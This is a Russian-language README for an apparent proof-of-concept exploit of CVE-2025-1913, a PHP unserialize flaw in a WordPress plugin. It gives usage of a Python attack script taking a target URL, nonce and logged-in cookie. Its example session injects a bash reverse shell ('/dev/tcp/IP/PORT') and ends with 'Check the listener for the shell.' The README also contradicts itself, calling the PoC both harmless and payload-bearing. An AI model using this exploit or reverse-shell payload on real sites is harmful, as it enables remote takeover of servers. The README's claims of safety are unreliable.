
PoC, демонстрирующий CVE-2025-1913 и показывающий, как небезопасная обработка unserialize в плагине может приводить к поведению с высоким уровнем воздействия в контролируемых средах. Содержит вредоносную нагрузку только для авторизованного тестирования. Используйте строго в изолированных лабораториях и для оборонительных исследований.
Этот репозиторий содержит только для обучения доказательство концепции (PoC) для CVE-2025-1913, созданное Suhaib518 🇸🇦. Это PoC демонстрирует, как специально созданный сериализованный PHP-ввод может вызвать уязвимую логику в затронутых компонентах WordPress. PoC безопасен и не содержит вредоносных нагрузок.
⚠️ Отказ от ответственности: Это PoC предназначено только для обучения, исследований и тестирования защитных мер безопасности. НЕ используйте его на серверах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.
Уязвимость существует из-за небезопасной обработки сериализованных PHP-данных в некоторых рабочих процессах плагинов WordPress. Это PoC показывает, как злоумышленник может предоставить специально созданные сериализованные структуры, которые вызывают непреднамеренное внутреннее поведение.
Этот репозиторий включает скрипт на Python, который:
.
├── CVE-2025-1913-PoC.py # Скрипт PoC, созданный Suhaib518 KSA
└── README.md # Документация
Скрипт использует только встроенные модули Python, за исключением requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
Вас спросят:
Затем скрипт сериализует их, сформирует запрос к WordPress и отправит его.
Ниже приведен пример команды, демонстрирующей использование с примерами значений (они не являются вредоносными, только показывают процесс):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
Примеры ответов на интерактивные вопросы:
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
После чего скрипт выведет:
[*] Sending request…
....Check the listener for the shell.
unserialize() на ненадежных входных данныхЛицензия MIT.
Создано Suhaib518 🇸🇦.